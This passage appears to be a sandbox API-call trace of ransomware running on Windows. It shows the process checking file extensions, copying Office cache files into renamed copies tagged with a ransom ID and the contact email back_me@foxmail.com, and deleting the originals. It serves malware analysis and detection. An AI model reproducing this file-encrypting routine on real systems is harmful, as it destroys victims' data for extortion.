(lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.186] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 1 [0047.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.186] lstrlenW (lpString=".doc") returned 4 [0047.186] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0047.186] lstrlenW (lpString=".docx") returned 5 [0047.186] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0047.186] lstrlenW (lpString=".pdf") returned 4 [0047.186] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0047.186] lstrlenW (lpString=".xls") returned 4 [0047.186] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0047.186] lstrlenW (lpString=".xlsx") returned 5 [0047.186] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0047.186] lstrlenW (lpString=".ppt") returned 4 [0047.186] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0047.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.186] lstrlenW (lpString=".zip") returned 4 [0047.186] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0047.186] lstrlenW (lpString=".rar") returned 4 [0047.186] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0047.186] lstrlenW (lpString=".bz2") returned 4 [0047.186] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0047.186] lstrlenW (lpString=".7z") returned 3 [0047.186] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0047.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.187] lstrlenW (lpString=".dbf") returned 4 [0047.187] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.187] lstrlenW (lpString=".1cd") returned 4 [0047.187] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.187] lstrlenW (lpString=".jpg") returned 4 [0047.187] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.187] lstrlenW (lpString=".doc") returned 4 [0047.187] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString=".docx") returned 5 [0047.187] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0047.187] lstrlenW (lpString=".pdf") returned 4 [0047.187] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString=".xls") returned 4 [0047.187] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString=".xlsx") returned 5 [0047.187] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0047.187] lstrlenW (lpString=".ppt") returned 4 [0047.187] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.187] lstrlenW (lpString=".zip") returned 4 [0047.187] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString=".rar") returned 4 [0047.187] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString=".bz2") returned 4 [0047.187] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0047.187] lstrlenW (lpString=".7z") returned 3 [0047.187] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0047.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.188] lstrlenW (lpString=".dbf") returned 4 [0047.188] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0047.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.188] lstrlenW (lpString=".1cd") returned 4 [0047.188] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0047.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.188] lstrlenW (lpString=".jpg") returned 4 [0047.188] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0047.188] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0047.188] lstrlenW (lpString="OfficeMUISet.msi") returned 16 [0047.188] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.188] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=868864) returned 1 [0047.188] CloseHandle (hObject=0x1f8) returned 1 [0047.188] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 0x2020 [0047.188] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.188] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.189] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.189] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.189] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.189] GetLastError () returned 0x0 [0047.189] ReadFile (in: hFile=0x1f8, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0047.217] WriteFile (in: hFile=0x200, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0047.539] ReadFile (in: hFile=0x1f8, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.540] WriteFile (in: hFile=0x200, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0047.540] SetEndOfFile (hFile=0x200) returned 1 [0047.540] CloseHandle (hObject=0x200) returned 1 [0047.541] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.541] SetEndOfFile (hFile=0x1f8) returned 1 [0047.548] CloseHandle (hObject=0x1f8) returned 1 [0047.549] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.549] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 1 [0047.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.549] lstrlenW (lpString=".doc") returned 4 [0047.549] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.549] lstrlenW (lpString=".docx") returned 5 [0047.549] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.549] lstrlenW (lpString=".pdf") returned 4 [0047.549] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.549] lstrlenW (lpString=".xls") returned 4 [0047.549] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.549] lstrlenW (lpString=".xlsx") returned 5 [0047.549] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.550] lstrlenW (lpString=".ppt") returned 4 [0047.550] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.550] lstrlenW (lpString=".zip") returned 4 [0047.550] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.550] lstrlenW (lpString=".rar") returned 4 [0047.550] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.550] lstrlenW (lpString=".bz2") returned 4 [0047.550] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.550] lstrlenW (lpString=".7z") returned 3 [0047.550] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.550] lstrlenW (lpString=".dbf") returned 4 [0047.550] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.550] lstrlenW (lpString=".1cd") returned 4 [0047.550] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.550] lstrlenW (lpString=".jpg") returned 4 [0047.550] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.550] lstrlenW (lpString=".doc") returned 4 [0047.551] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.551] lstrlenW (lpString=".docx") returned 5 [0047.551] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.551] lstrlenW (lpString=".pdf") returned 4 [0047.551] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.551] lstrlenW (lpString=".xls") returned 4 [0047.551] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.551] lstrlenW (lpString=".xlsx") returned 5 [0047.551] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.551] lstrlenW (lpString=".ppt") returned 4 [0047.551] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.551] lstrlenW (lpString=".zip") returned 4 [0047.551] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.551] lstrlenW (lpString=".rar") returned 4 [0047.551] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.551] lstrlenW (lpString=".bz2") returned 4 [0047.551] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.551] lstrlenW (lpString=".7z") returned 3 [0047.551] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.551] lstrlenW (lpString=".dbf") returned 4 [0047.551] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.551] lstrlenW (lpString=".1cd") returned 4 [0047.551] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.551] lstrlenW (lpString=".jpg") returned 4 [0047.551] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.552] lstrcmpiW (lpString1=".MST", lpString2=".php") returned -1 [0047.552] lstrlenW (lpString="ShellUI.MST") returned 11 [0047.552] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.552] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=3584) returned 1 [0047.552] CloseHandle (hObject=0x1f8) returned 1 [0047.552] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 0x2020 [0047.552] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.552] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.553] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.553] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.553] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.553] GetLastError () returned 0x0 [0047.553] ReadFile (in: hFile=0x1f8, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0xe00, lpOverlapped=0x0) returned 1 [0047.629] WriteFile (in: hFile=0x200, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xe10, lpOverlapped=0x0) returned 1 [0047.630] ReadFile (in: hFile=0x1f8, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.630] WriteFile (in: hFile=0x200, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.630] SetEndOfFile (hFile=0x200) returned 1 [0047.630] CloseHandle (hObject=0x200) returned 1 [0047.630] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.630] SetEndOfFile (hFile=0x1f8) returned 1 [0047.631] CloseHandle (hObject=0x1f8) returned 1 [0047.631] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.631] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 1 [0047.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.631] lstrlenW (lpString=".doc") returned 4 [0047.631] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0047.632] lstrlenW (lpString=".docx") returned 5 [0047.632] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0047.632] lstrlenW (lpString=".pdf") returned 4 [0047.632] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0047.632] lstrlenW (lpString=".xls") returned 4 [0047.632] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0047.632] lstrlenW (lpString=".xlsx") returned 5 [0047.632] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0047.632] lstrlenW (lpString=".ppt") returned 4 [0047.632] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0047.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.632] lstrlenW (lpString=".zip") returned 4 [0047.632] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0047.632] lstrlenW (lpString=".rar") returned 4 [0047.632] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0047.632] lstrlenW (lpString=".bz2") returned 4 [0047.632] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0047.632] lstrlenW (lpString=".7z") returned 3 [0047.632] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0047.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.632] lstrlenW (lpString=".dbf") returned 4 [0047.632] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0047.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.632] lstrlenW (lpString=".1cd") returned 4 [0047.632] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0047.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.632] lstrlenW (lpString=".jpg") returned 4 [0047.632] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0047.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.632] lstrlenW (lpString=".doc") returned 4 [0047.632] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0047.632] lstrlenW (lpString=".docx") returned 5 [0047.632] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0047.633] lstrlenW (lpString=".pdf") returned 4 [0047.633] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0047.633] lstrlenW (lpString=".xls") returned 4 [0047.633] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0047.633] lstrlenW (lpString=".xlsx") returned 5 [0047.633] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0047.633] lstrlenW (lpString=".ppt") returned 4 [0047.633] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0047.633] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.633] lstrlenW (lpString=".zip") returned 4 [0047.633] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0047.633] lstrlenW (lpString=".rar") returned 4 [0047.633] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0047.633] lstrlenW (lpString=".bz2") returned 4 [0047.633] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0047.633] lstrlenW (lpString=".7z") returned 3 [0047.633] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0047.633] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.633] lstrlenW (lpString=".dbf") returned 4 [0047.633] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0047.633] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.633] lstrlenW (lpString=".1cd") returned 4 [0047.633] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0047.633] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.633] lstrlenW (lpString=".jpg") returned 4 [0047.633] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0047.633] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0047.633] lstrlenW (lpString="AccLR.cab") returned 9 [0047.633] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.677] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=28016276) returned 1 [0047.677] CloseHandle (hObject=0x1f4) returned 1 [0047.677] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab")) returned 0x2020 [0047.677] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.678] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0047.678] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.678] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.678] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.678] ReadFile (in: hFile=0x1f4, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.685] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.685] ReadFile (in: hFile=0x1f4, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 